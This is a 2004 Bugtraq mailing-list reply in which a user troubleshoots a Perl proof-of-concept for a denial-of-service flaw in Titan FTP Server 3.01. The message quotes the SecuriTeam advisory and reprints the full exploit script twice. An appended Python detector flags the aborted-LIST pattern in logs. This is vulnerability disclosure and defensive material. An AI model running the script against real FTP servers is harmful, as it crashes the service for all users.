Date: Thu, 06 May 2004 19:19:59 -0700
From: Gene Ken <gken@....sina.com>
To: Aviram Jenik <aviram@...ondsecurity.com>
Cc: bugtraq@...urityfocus.com
Subject: Re: Titan FTP Server Aborted LIST DoS

Hi Aviram,

I have some trouble with the testing of current exploit, the below is my tested procedure:

1) In my test bed, the host side is winxp professional with ip_addr 192.168.0.2 (english, 5.1 build 2600), and the client side is redhat linux 9 using NAT in Vmware Workstation 4.5.1 build-7568 with ip_addr 192.168.92.3.

2) I have successfully Titan Ftp Server v3.01 Build 163 installed on Winxp Pro platform. also the perl script u mentioned in ur article has successfully executed like as the below:

/* on my redhat box, i use ftp to verify if the titan ftp server is running, the result is the info as below: */
[gken@rh9 gken]$ ftp 192.168.0.2
Connected to 192.168.0.2 (192.168.0.2).
220 Titan FTP Server 3.01.163 Ready.
Name (192.168.0.2:gken): gken
331 User name okay, need password.
Password:
230-Welcome gken from 192.168.0.2. You are now logged in to the server.
230 User logged in, proceed.
Remote system type is UNIX.
Using binary mode to transfer files.

/* executing titan.pl script */
[gken@rh9 gken]$ perl titan.pl
Combination:
cannot connect to ftp daemon on 192.168.0.2 at titan.pl line 22.

how to tackle this? thx in advance!

---the titan.pl---
#!/usr/bin/perl
# Test for Titan FTP server security vulnerability
#
# Orkut users? Come join the SecuriTeam community
# http://www.orkut.com/Community.aspx?cmm=44441
#
use IO::Socket;

$host = "192.168.0.2";

my @combination;
$combination[0] = "LIST \r\n";

for (my $i = 0; $combination[$i] ; $i++)
{
 print "Combination: $1\n";

 $remote = IO::Socket::INET->new ( Proto => "tcp",
     PeerAddr => $host,
     PeerPort => "2112",
 );
 unless ($remote) { die "cannot connect to ftp daemon on $host" }

 print "connected\n";
 while (<$remote>)
 {
  print $_;
  if (/220 /)
  {
   last;
  }
 }

 $remote->autoflush(1);

 my $ftp = "USER anonymous\r\n";

 print $remote $ftp;
 print $ftp;

 while (<$remote>)
 {
  print $_;
  if (/331 /)
  {
   last;
  }
 }

 $ftp = "PASS a\@b.com\r\n";
 print $remote $ftp;
 print $ftp;

 while (<$remote>)
 {
  print $_;
  if (/230 /)
  {
   last;
  }
 }

 $ftp = $combination[$i];

 print $remote $ftp;
 print $ftp;

 while (<$remote>)
 {
  print $_;
  if (/150 /)
  {
   last;
  }

  close $remote;
 }
}

At 05:51 AM 5/5/2004, you wrote:
> Titan FTP Server Aborted LIST DoS
>----------------------------------------------------
>
>
>Article reference:
>http://www.securiteam.com/windowsntfocus/5RP0215CUU.html
>
>
>SUMMARY
>
>A security vulnerability exists in South River Technologies' Titan FTP
>Server.
>An attacker issuing a LIST command and disconnecting before the LIST command
>had the time to connect, will cause the program to try and access an invalid
>socket. This will result in the FTP service's crash (and in turn, no longer
>being able to service any additional users).
>
>
>DETAILS
>
>Vulnerable Systems:
> * Titan FTP Server version 3.01 build 163
>
> Immune Systems:
> * Titan FTP Server version 3.10 build 169
>
> Solution:
> To solve this issue upgrade to the latest version (3.10 build 169 or newer).
>
> Exploit:
> #!/usr/bin/perl
> # Test for Titan FTP server security vulnerability
> #
> # Orkut users? Come join the SecuriTeam community
> # http://www.orkut.com/Community.aspx?cmm=44441
> #
> use IO::Socket;
>
> $host = "192.168.1.243";
>
> my @combination;
> $combination[0] = "LIST \r\n";
>
> for (my $i = 0; $combination[$i] ; $i++)
> {
>  print "Combination: $1\n";
>
>  $remote = IO::Socket::INET->new ( Proto => "tcp",
>      PeerAddr => $host,
>      PeerPort => "2112",
>  );
>  unless ($remote) { die "cannot connect to ftp daemon on $host" }
>
>  print "connected\n";
>  while (<$remote>)
>  {
>   print $_;
>   if (/220 /)
>   {
>    last;
>   }
>  }
>
>  $remote->autoflush(1);
>
>  my $ftp = "USER anonymous\r\n";
>
>  print $remote $ftp;
>  print $ftp;
>
>  while (<$remote>)
>  {
>   print $_;
>   if (/331 /)
>   {
>    last;
>   }
>  }
>
>  $ftp = "PASS a\@b.com\r\n";
>  print $remote $ftp;
>  print $ftp;
>
>  while (<$remote>)
>  {
>   print $_;
>   if (/230 /)
>   {
>    last;
>   }
>  }
>
>  $ftp = $combination[$i];
>
>  print $remote $ftp;
>  print $ftp;
>
>  while (<$remote>)
>  {
>   print $_;
>   if (/150 /)
>   {
>    last;
>   }
>
>
>   close $remote;
>  }
>
>
>ADDITIONAL INFORMATION
>
>SecurITeam would like to thank <mailto:storm@...uriteam.com> STORM for
>finding this vulnerability.
>
>
>Regards,
>Aviram Jenik
>Beyond Security Ltd.
>
>http://www.BeyondSecurity.com
>http://www.SecuriTeam.com
>
>The First Integrated Network and Web Application Vulnerability Scanner:
>http://www.beyondsecurity.com/webscan-wp.pdf
>
>
>====================
>====================
>
>DISCLAIMER:
>The information in this bulletin is provided "AS IS" without warranty of any
>kind.
>In no event shall we be liable for any damages whatsoever including direct,
>indirect, incidental, consequential, loss of business profits or special
>damages.

Regards,
Gene Ken
86-10-62928315 (Home)
86-13901016339 (Cell)
/* Out of intense complexities, emerge intense simplicities. */
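
The SUMMARY in the quoted advisory describes a session that sends LIST and then disconnects before the server has answered. The following is an added example, not part of the original post or the advisory: a Python log check that flags that pattern, including the case where the log simply stops after the LIST because the service went down. The log layout, the sample lines (constructed) and the names SAMPLE_LOG, LINE_RE and find_aborted_listings are assumptions.

```python
import re

# Constructed sample in an assumed "timestamp [session] EVENT detail" layout;
# adapt LINE_RE to whatever your FTP server actually logs.
SAMPLE_LOG = """\
2004-05-06 19:01:02 [12] CONNECT 192.168.92.3
2004-05-06 19:01:03 [12] RECV USER anonymous
2004-05-06 19:01:03 [12] SEND 331 User name okay, need password.
2004-05-06 19:01:03 [12] RECV PASS ****
2004-05-06 19:01:03 [12] SEND 230 User logged in, proceed.
2004-05-06 19:01:04 [12] RECV LIST
2004-05-06 19:01:04 [12] DISCONNECT
2004-05-06 19:02:10 [13] CONNECT 192.168.92.7
2004-05-06 19:02:12 [13] RECV LIST
2004-05-06 19:02:12 [13] SEND 150 Opening data connection.
2004-05-06 19:02:13 [13] SEND 226 Transfer complete.
2004-05-06 19:02:20 [13] DISCONNECT
2004-05-06 19:03:00 [14] CONNECT 192.168.92.9
2004-05-06 19:03:01 [14] RECV LIST
"""

LINE_RE = re.compile(r"^(\S+ \S+) \[(\d+)\] (CONNECT|RECV|SEND|DISCONNECT)\s*(.*)$")


def find_aborted_listings(log_text):
    """Return (session, peer, time, reason) for each LIST the server never answered."""
    peers, pending, findings = {}, {}, []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # skip lines that are not in the assumed layout
        ts, sid, event, detail = m.groups()
        if event == "CONNECT":
            peers[sid] = detail
            pending.pop(sid, None)  # session ids can be reused after a restart
        elif event == "RECV" and detail.upper().split()[:1] == ["LIST"]:
            pending[sid] = ts  # LIST seen, no reply logged yet
        elif event == "SEND":
            pending.pop(sid, None)  # server replied, so not the aborted case
        elif event == "DISCONNECT" and sid in pending:
            findings.append((sid, peers.get(sid, "?"), pending.pop(sid), "client disconnected"))
    # A crashed service may never log the disconnect, so report leftovers too.
    for sid, ts in pending.items():
        findings.append((sid, peers.get(sid, "?"), ts, "log ends unanswered"))
    return findings


if __name__ == "__main__":
    for finding in find_aborted_listings(SAMPLE_LOG):
        print(finding)
```
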